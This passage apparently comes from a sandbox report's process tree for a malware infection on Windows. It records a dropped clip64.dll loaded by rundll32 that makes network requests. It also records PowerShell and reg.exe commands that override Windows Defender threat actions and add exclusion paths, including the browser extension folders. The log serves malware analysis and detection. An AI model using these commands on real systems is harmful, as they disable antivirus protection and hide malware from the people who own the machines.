                                                              • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191538331\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191538331\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
                                                                5⤵
                                                                  PID:1552
                                                                • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191538331\assistant\assistant_installer.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191538331\assistant\assistant_installer.exe" --version
                                                                  5⤵
                                                                    PID:872
                                                                    • C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191538331\assistant\assistant_installer.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191538331\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x3b6038,0x3b6044,0x3b6050
                                                                      6⤵
                                                                        PID:4064
                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                                                  3⤵
                                                                    PID:5928
                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                  2⤵
                                                                  • Blocklisted process makes network request
                                                                  • Loads dropped DLL
                                                                  PID:1352
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5772 -ip 5772
                                                                1⤵
                                                                  PID:3620
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                  1⤵
                                                                    PID:4500
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                    1⤵
                                                                      PID:3008
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1348 -ip 1348
                                                                      1⤵
                                                                        PID:4784
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 5056 -ip 5056
                                                                        1⤵
                                                                          PID:4932
                                                                        • C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\qpWEwUa.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\qpWEwUa.exe em /Tzsite_idneH 385118 /S
                                                                          1⤵
                                                                            PID:2712
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                              2⤵
                                                                                PID:624
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:4596
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                      4⤵
                                                                                        PID:780
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                      3⤵
                                                                                        PID:4040
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                        3⤵
                                                                                          PID:5460
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                          3⤵
                                                                                            PID:4896
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                            3⤵
                                                                                              PID:4084
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                              3⤵
                                                                                                PID:3460
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                3⤵
                                                                                                  PID:5944
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                  3⤵
                                                                                                    PID:2656
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:2292
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                      3⤵
                                                                                                        PID:2804
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                        3⤵
                                                                                                          PID:780
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                          3⤵
                                                                                                            PID:4480
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                            3⤵
                                                                                                              PID:5176
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                              3⤵
                                                                                                                PID:4364
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:2268
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:1032
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:2588
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:2208
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:4900
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:5316
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:1028
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:2464
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                3⤵
                                                                                                                                  PID:2764
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:3472
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:2496
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:4832
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                        3⤵
                                                                                                                                          PID:5532
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                          3⤵
                                                                                                                                            PID:4440
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ARTXeDTAxvUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ByWuwrOBU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DUGaRsFaSnqjC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RVqmAwyyxwiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\wGkeBUkfAIhWvVVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ofqvFcNvzeRditbz\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                          2⤵
                                                                                                                                            PID:5324
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:2800
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                    PID:232
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ARTXeDTAxvUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2804
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                    3⤵
                                                                                                                                                      PID:5532
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ByWuwrOBU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2308
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                        3⤵
                                                                                                                                                          PID:2576
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DUGaRsFaSnqjC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          3⤵
                                                                                                                                                            PID:5492
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3480
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RVqmAwyyxwiU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4264
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:3880
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:4440
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:3920
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\wGkeBUkfAIhWvVVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:1344
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:3816
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:3316
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:3728
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:432
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:5964
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4832
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:5736
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\ofqvFcNvzeRditbz /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:4596
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
